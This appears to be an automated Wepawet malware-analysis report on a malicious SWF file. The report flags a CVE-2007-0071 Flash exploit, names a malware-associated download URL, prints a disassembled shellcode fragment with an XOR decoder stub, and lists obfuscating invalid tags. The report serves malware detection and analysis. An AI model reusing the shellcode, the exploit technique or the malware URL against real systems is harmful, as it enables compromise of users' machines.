Analysis report for 0d4f7aef9e740091bd5a20c52f7b7ad6.swf

WARNING: This SWF contains a supicious Scene Count variable that could result in an integer overflow in older Adobe Flash players. This makes it possible for the SWF file to execute malicious code without the user knowing. See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0071 for more information.
NOTE: This SWF file contains ActionScript 3.0 code. Execution of AS3 code is not currently supported by Wepawet.
  1. Summary [?]
      2. Result: MALICIOUS
      • CVE-2007-0071 exploit detect.
      • Detected URLs are associated with malware.
      • Shellcode was detected.

  2. Details
    3. Hash: 0d4f7aef9e740091bd5a20c52f7b7ad6
    Submitted On: 2008-12-28 16:02:57
    Processing Start: 2009-06-04 02:22:47
    Processing End: 2009-06-04 02:26:11
    SWF Version: 6

    Virustotal Report (malicious)

  3. Referenced Urls [?]

    1. http://qq.18i16.net/exe1/b04.css
      Discovery MethodOffsetExtra
      Static0x3b3Anubis
      Virustotal
      Domain Associated with Malware!

  4. Shellcode [?]
      5. Shellcode detected starting at file offset 0x10b
      000000D3  B4F7              mov ah,0xf7
000000D5  209F9EB0ED4A      and [edi+0x4aedb09e],bl
000000DB  7203              jc 0xe0
000000DD  A5                movsd
000000DE  C0AD99ABF6C940    shr byte [ebp-0x36095467],0x40
000000E5  2BF2              sub esi,edx
000000E7  EAACDFB0B94052    jmp dword 0x5240:0xb9b0dfac
000000EE  D1                db 0xD1
000000EF  759E              jnz 0x8f
000000F1  2960EB            sub [eax-0x15],esp
000000F4  16                push ss
000000F5  5B                pop ebx
000000F6  33D2              xor edx,edx
000000F8  66B889A7          mov ax,0xa789
000000FC  66310453          xor [ebx+rdx*2],ax
00000100  42                inc edx
00000101  40                inc eax
00000102  6681FA5101        cmp dx,0x151
00000107  7CF3              jl 0xfc
00000109  EB05              jmp short 0x110
0000010B  E8E5FFFFFF        call dword 0x1000000f5
00000110  60                pushad
00000111  C288A7            ret 0xa788
00000114  8BF8              mov edi,eax
00000116  E697              out 0x97,al
00000118  D4C3              aam 0xc3
0000011A  05A6043F38        add eax,0x383f04a6
0000011F  A7                cmpsd
00000120  91                xchg eax,ecx
00000121  A7                cmpsd
00000122  19E7              sbb edi,esp
00000124  9F                lahf
00000125  2CE4              sub al,0xe4
00000127  BB382CFEAF        mov ebx,0xaffe2c38
0000012C  1C50              sbb al,0x50
0000012E  194B99            sbb [ebx-0x67],ecx
00000131  A5                movsd
00000132  9AA71E7CE9A05A    call dword 0x5aa0:0xe97c1ea7
00000139  E1BA              loope 0xf5
0000013B  6E                outsb


  5. Obfuscation Techniques
    1. Invalid tags
      1. Tag Type 255 at file byte offset 27
      2. Tag Type 157 at file byte offset 1544
      3. Tag Type 157 at file byte offset 1585
      4. Tag Type 157 at file byte offset 1626
      5. Tag Type 133 at file byte offset 1667
      6. Tag Type 133 at file byte offset 1702
      7. Tag Type 133 at file byte offset 1737
      8. Tag Type 133 at file byte offset 1772
      9. Tag Type 181 at file byte offset 1807
      10. Tag Type 181 at file byte offset 1842
      11. Tag Type 181 at file byte offset 1889